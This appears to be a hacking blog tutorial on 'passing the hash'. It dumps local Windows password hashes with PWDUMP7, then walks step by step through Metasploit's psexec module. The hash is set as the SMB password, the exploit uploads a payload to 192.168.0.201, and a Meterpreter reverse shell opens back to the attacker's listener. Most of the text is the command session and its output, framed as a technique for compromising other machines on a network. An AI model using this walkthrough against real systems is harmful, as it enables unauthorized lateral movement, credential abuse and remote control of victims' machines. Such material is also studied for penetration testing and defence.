Get your mind out of the gutter you hippies. This is an exploitation technique.
So, let’s assume you used one of the previous local exploits and elevated your effective permissions. If you’re looking to exploit other machines on the network, an old common exploit practice is to dump the local password hashes and run them through John the Ripper, L0phtcrack, or Rainbow Tables to crack the password. If you can get the password for the local Administrator account on one machine, you can usually use that password to exploit other machines on the network. Although, if the password is complex enough or LM hashes aren’t even used, it can take a considerable amount of time to actually crack the password, which is where “passing the hash” comes in.
There is an excellent White Paper from SANS that goes much deeper into the subject than I can here. The gist of the technique is that instead of going through the extensive process of cracking the password, you can simply pass the clear text hash to the remote machine for authentication. The easiest tool I’ve found to utilize this technique is the PSEXEC module within Metasploit. Let’s have a quick demonstration.
First, we use PWDUMP7 to dump the local password hashes. There is also a “hashdump” utility built into Metasploit, but we’re working locally here, so maybe we can cover that later. Here is the resulting hash dump:
Administrator:500:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::
ASPNET:1006:0252CBAB72B4492F13D74481B172E825:B3236BC498A33A3CA9B3D4C8E48D3373:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:107ECC6AB4CB35CFF2F678D9BC377703:B45E9E043A3889F9677F14CB7B2F54B9:::
IUSR_BUDLITE:1004:01C2F26EC4009168A67DFDCFBD090BB0:54D4FFC14D3C6460EEFD7A8194033430:::
IWAM_BUDLITE:1005:379388EA83410A09DC58A39F55298A65:6DEAD04C4D643F7FAF3AEAAA16D68D7F:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:A8DAF152C2B78D9724CECC070C06E407:::
Notice that the Administrator has the entry “NO PASSWORD*********************”. This simply means that the LM hash is not available and we must replace the string with 32 zeros to utilize it.
Next, we fire up Metasploit and configure the password parameter for the PSEXEC module with the hash that we dumped.
msf > search psexec [*] Searching loaded modules for pattern 'psexec'... Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution msf > use windows/smb/psexec msf exploit(psexec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > set RHOST 192.168.0.201 RHOST => 192.168.0.201 msf exploit(psexec) > set SMBUser Administrator SMBUser => Administrator msf exploit(psexec) > set SMBPass 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C SMBPass => 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.0.147:4444 [*] Connecting to the server... [*] Authenticating to 192.168.0.201:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \PXmhNDSB.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (vzchEyYr - "MFlhSviwvJVrxoiou")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Sending stage (749056 bytes) to 192.168.0.201 [*] Deleting \PXmhNDSB.exe... [*] Meterpreter session 1 opened (192.168.0.147:4444 -> 192.168.0.201:1085) at Fri Dec 31 15:57:45 -0500 2010 meterpreter >
And there we have our wonderful Meterpreter session, without even knowing what the actual Administrator password is. Since this is our first introduction to Metasploit, I have to point you to Metasploit Unleased, which is maintained by the guys at Offensive Security and is an invaluable resource to learn many of the capabilities of the tool. Check it out!